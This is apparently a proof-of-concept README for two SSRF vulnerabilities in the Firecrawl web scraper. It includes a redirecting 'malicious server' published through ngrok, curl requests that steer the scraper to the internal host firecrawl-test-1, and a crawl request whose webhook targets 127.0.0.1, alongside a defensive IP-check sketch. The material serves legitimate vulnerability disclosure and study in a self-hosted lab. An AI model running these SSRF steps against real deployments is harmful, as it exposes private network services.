# CVE-2024-56800 POC

## Reference
https://nvd.nist.gov/vuln/detail/CVE-2024-56800

https://github.com/firecrawl/firecrawl/commit/4d1f92f4c8c36403022428285a03621fd90d62ec

https://github.com/firecrawl/firecrawl/security/advisories/GHSA-vjp8-2wgg-p734

## Vulnerability
Firecrawl is a web scraper that lets users extract the content of a webpage.
Versions prior to 1.1.1 contain a server-side request forgery (SSRF) vulnerability.
The scraper engine follows redirects from a scraped website to any local IP address, which leaks resources on the server's private network.

The vulnerable code is in `apps/api/src/controllers/v1/scrape.ts`.

The user input is not sanitized, so the request can end up targeting a private IP address. When the target is 127.0.0.1, the request is sent into Firecrawl's own local network, which exposes the Firecrawl server's internal services.
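
The kind of check that is missing here can be sketched in Python. This is only an illustration, not Firecrawl's actual patch: the helper names `is_internal_ip` and `url_targets_internal_host` are hypothetical. For a redirect-based SSRF like this one, such a check would need to run on every redirect hop, not only on the URL the user submits.

```python
import ipaddress
import socket
from urllib.parse import urlparse


def is_internal_ip(address: str) -> bool:
    """Return True for loopback, private, link-local, and similar addresses."""
    ip = ipaddress.ip_address(address)
    return (
        ip.is_private
        or ip.is_loopback
        or ip.is_link_local
        or ip.is_reserved
        or ip.is_unspecified
    )


def url_targets_internal_host(url: str) -> bool:
    """Return True if the URL's host is, or resolves to, an internal address."""
    host = urlparse(url).hostname
    if host is None:
        return True  # no host to inspect: treat as unsafe
    try:
        return is_internal_ip(host)  # host is an IP literal
    except ValueError:
        pass  # host is a name, so resolve it below
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return True  # unresolvable: reject rather than guess
    # Strip any IPv6 scope id ("%eth0") before parsing the address.
    return any(is_internal_ip(info[4][0].split("%")[0]) for info in infos)
```

With this sketch, `url_targets_internal_host("http://127.0.0.1:80")` is rejected, while a URL with a public IP literal passes.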


## How to use this POC
### 1. download this POC
```
git clone https://github.com/cyhe50/cve-2024-56800-poc
cd cve-2024-56800-poc 
```

### 2. start a self-hosted firecrawl server
```
cd scraper/firecrawl-1.0.0
docker-compose up -d
cd ../..
```

### 3. start a malicious server
```
cd malicious_server
docker build -t malicious_server .
docker run -p 8000:80 malicious_server
```

### 4. publish the malicious server
The malicious server has to be publicly reachable because the Firecrawl server blocks private URLs.
If you don't want to make the server public, I believe you can comment out the validation in Firecrawl directly.

Here is what I did, using ngrok:
```
ngrok http 8000
```

### 5. run scraper
Using curl (remember to replace the URL with the one ngrok generated):
```
curl -X POST http://localhost:3002/v1/scrape \
      -H 'Content-Type: application/json' \
      -d '{
        "url": "https://xxxxx.ngrok-free.app",
        "formats": ["markdown", "html"]
      }'
```
<img width="1506" height="190" alt="Screenshot 2025-11-01 at 7 51 02 PM" src="https://github.com/user-attachments/assets/d06df9ed-3c40-4ed6-923a-d820be14a619" />


Alternatively, using scraper.py:
```
cd scraper
```

Important: open the Dockerfile and change the URL to the one you just generated, then build and run:
```
docker build -t scraper .
docker run scraper
```
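
For reference, the scrape request from the curl command in this step can also be built in Python with only the standard library. This is a sketch under assumptions, not the repo's `scraper.py`: the function names `build_scrape_request` and `scrape` are hypothetical, and the endpoint and payload are copied from the curl example.

```python
import json
import urllib.request


def build_scrape_request(target_url, api_base="http://localhost:3002"):
    """Build the POST /v1/scrape request without sending it."""
    payload = {"url": target_url, "formats": ["markdown", "html"]}
    return urllib.request.Request(
        f"{api_base}/v1/scrape",
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def scrape(target_url, api_base="http://localhost:3002"):
    """Send the request and return the decoded JSON response."""
    request = build_scrape_request(target_url, api_base)
    with urllib.request.urlopen(request, timeout=60) as response:
        return json.loads(response.read().decode("utf-8"))
```

Calling `scrape("https://xxxxx.ngrok-free.app")` with your own ngrok URL returns whatever JSON the self-hosted API responds with.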

### expected output

## How the POC works

### Vulnerable Source Code

When the self-hosted Firecrawl server starts, five services are launched; one of them is `firecrawl-test-1` (run `docker ps` for details).
Because all five services are on the same Docker network, they can reach each other by container name.

For example, try to connect to `firecrawl-test-1` by running curl directly on the local machine:
```
curl http://firecrawl-test-1:80
# or
curl http://localhost:80
```
Neither command should work, because the local machine is not on the same network as `firecrawl-test-1`.


However, from inside `firecrawl-api-1`:
```
docker exec -it firecrawl-api-1 /bin/bash
# then, inside the container:
curl http://firecrawl-test-1:80
# or
curl http://localhost:80
```
This should return the expected data, because both containers are on the same network.


The malicious server redirects to http://firecrawl-test-1:80, which is only reachable from inside the Firecrawl network.
Therefore, successfully reaching the `firecrawl-test-1` server means the scraper followed the redirect to its own internal server.
This shows how the SSRF exposes resources on the private server.
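
The redirect behavior described above can be sketched with Python's standard `http.server`. This is an assumption about what such a server looks like, not the actual code in `malicious_server`; `make_redirect_server` is a hypothetical name, and the target URL is the one named in this README.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Internal target taken from this README; only resolvable inside the Firecrawl network.
INTERNAL_TARGET = "http://firecrawl-test-1:80"


def make_redirect_server(host="127.0.0.1", port=8000, target=INTERNAL_TARGET):
    """Create an HTTP server that answers every GET with a 302 to `target`."""

    class RedirectHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            # Send the scraper to the internal service instead of serving content.
            self.send_response(302)
            self.send_header("Location", target)
            self.end_headers()

        def log_message(self, format, *args):
            pass  # silence per-request logging

    return HTTPServer((host, port), RedirectHandler)
```

To run it, call `make_redirect_server("0.0.0.0", 80).serve_forever()` inside the container, or keep the default port 8000 when running directly on the host.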


# CVE-2025-57818
This is also an SSRF vulnerability.
It occurs in the crawl API, where the `webhook` parameter is not sanitized, so attackers can send POST requests into Firecrawl's local network.

The relevant code is in `apps/api/src/services/webhook.ts`. The problem is that the `webhookUrl` input is not sanitized.

The webhook sends a POST request to the specified URL. Here we set it to 127.0.0.1, and it connects to the internal server successfully.


```
curl -X POST http://localhost:3002/v1/crawl \
     -H 'Content-Type: application/json' \
     -d '{
       "url": "https://example.com",
       "webhook": "http://127.0.0.1:80"
     }'

```

The internal server received the POST request successfully:
<img width="790" height="30" alt="Screenshot 2025-11-01 at 7 56 53 PM" src="https://github.com/user-attachments/assets/82ac197d-a424-48c8-b6d0-a37a8088aa96" />
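
To observe a webhook delivery like this without relying on server logs, a small listener that records incoming POST requests can stand in for the internal server. This is a minimal sketch, not part of the POC: `make_webhook_listener` is a hypothetical name, and the listener has to run somewhere the Firecrawl containers can reach.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer


def make_webhook_listener(host="127.0.0.1", port=8080):
    """Create a server that records (path, body) for every POST it receives."""
    received = []

    class WebhookHandler(BaseHTTPRequestHandler):
        def do_POST(self):
            # Read exactly the number of bytes the client announced.
            length = int(self.headers.get("Content-Length", 0))
            body = self.rfile.read(length)
            received.append((self.path, body))
            self.send_response(200)
            self.end_headers()

        def log_message(self, format, *args):
            pass  # silence per-request logging

    return HTTPServer((host, port), WebhookHandler), received
```

After calling `serve_forever()` on the returned server (for example in a background thread), every POST that arrives shows up in the `received` list.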
